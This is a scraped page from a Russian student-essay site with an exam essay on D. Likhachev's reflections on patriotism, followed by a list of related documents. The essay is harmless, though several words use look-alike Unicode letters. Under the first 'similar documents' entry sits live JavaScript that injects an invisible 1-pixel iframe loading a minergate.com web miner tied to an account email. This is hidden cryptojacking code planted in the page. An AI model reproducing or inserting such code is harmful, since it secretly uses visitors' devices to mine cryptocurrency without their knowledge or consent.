-



   Часть С по тексту Д.Лихачева (о патриотизме)




doc.png  Тип документа: Сочинения


type.png  Предмет: ЕГЭ


type.png  ВУЗ: Не привязан


size.png  Размер: 0 b

Часть С по тексту Д.Лихачева (о патриотизме)

В центре внимания Д. Лихачева актуальная в наше время проблема патриотизма. Сейчас, как никогда раньше, задача формирования любви к родине в юных сердцах стоит на первом месте. Да, задача ᴄᴫᴏжная! Но ᴄᴫᴏжно, не значит невозможно.
Автор приводит нас к выводу о том, что чувство патриотизма играет очень важную роль в нашей жизни. Оно воспитывает в нас все то прекрасное и светлое, чем обязан обладать каждый человек. И начинается это чувство с самого простого, любви к тому, что нас окружает.
Рассуждая над данной проблемой, Д. Лихачев утверждает, что «… к патриотизму слишком долго призывали, а его надо воспитывать с самого раннего детства». Он также убеждает нас в том, что истинный высокий патриотизм рождается из любви к родным и близким. И ведь это действительно так!
Невозможно не согласиться с точкой зрения автора, ведь все великие умы мира сего веками рассуждали о патриотизме, как об очень ценном и достойном качестве. Приведу в пример цитату известного советского писателя Алексея Николаевича Толстого: «Любовь к родине – не отвлеченное понятие, но реальная душевная сила, требующая организации, развития и культуры».
Также можно вспомнить статью Юлиана Оксмана «Поимка поручика Сухинова». Известный писатель рассказал историю декабриста, который после разгрома восстания смог скрыться от полицейских ищеек и после мучительных скитаний, наконец, выбрался к границе. Еще минута – и он обретет свободу. Но беглец посмотрел на поле, лес, небо и понял, что не сможет жить на чужбине, вдали от родины. Он сдался полиции, его заковали в кандалы и отправили на каторгу.

На основании выше сказанного приходим к выводу, что Дмитрий Лихачев поднимает проблему патриотизма, призывает воспитывать его не только в самом себе, но и в окружающих вас людях. И я к нему присоединяюсь, любите свою Родину, учитывая, что любите своих родителей.



Похожие документы


Коммуникативное обучение русскому языку. Часть вторая
(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body")[0]; s.appendChild(w, s); })(); ...

Интегрированный урок по изучению комедии «Мещанин во дворянстве». Часть вторая
...

Изучение поэзии Такубоку в контексте японского искусства. Часть вторая
...

Избранное из «Жизненной драмы Платона» Часть вторая
И Платон и Гамлет, из страшного положения в начале их жизни оба вынесли, собственно, лишь ряд разговоров. Разговоры Гамлета глубокомысленны и остроумны. Разговоры Платона, с возражениями и дополнениями Аристотеля и стоиков и с заключениями новоплатоников, создали целый умственный мир, называемый греческою философией, и вошли в историческое развитие христианства как его главная основа. И все-таки приходится сказать, что жизненная трагедия Платона имела не только страшное начало, но и плачевный конец, как то и следует для настоящей трагедии. Из своего жизненного испытания он вышел хотя не без славы, но без победы. Подобно шекспировскому Гамлету — в отличие от сумароковского — он не мог жениться на своей Офелии: она утонула. В конце концов Платон, как Гамлет, оказался неудачником, хотя, разумеется, неудачи великого человека дают миру гораздо больше, чем множество самых блестящих удач людей обыкновенных....

Борисов Л. Под флагом Катрионы. Часть четвертая. Скитания. Глава вторая
Борисов Л. : Под флагом Катрионы. Часть четвертая. Скитания. Глава вторая "Нептун", - подсказал Симпсон. - "Одиннадцать тысяч дев", - не думая и радуясь находке, произнес Луи. - Недурно, а? Я засяду в каюте и с утра до вечера буду писать рассказы. Для романа мне нужен разбег. Для оседлой жизни - деньги. ...

Bigreferat.ru - каталог учебной информации (c) 2013-2014 | * | Правообладателям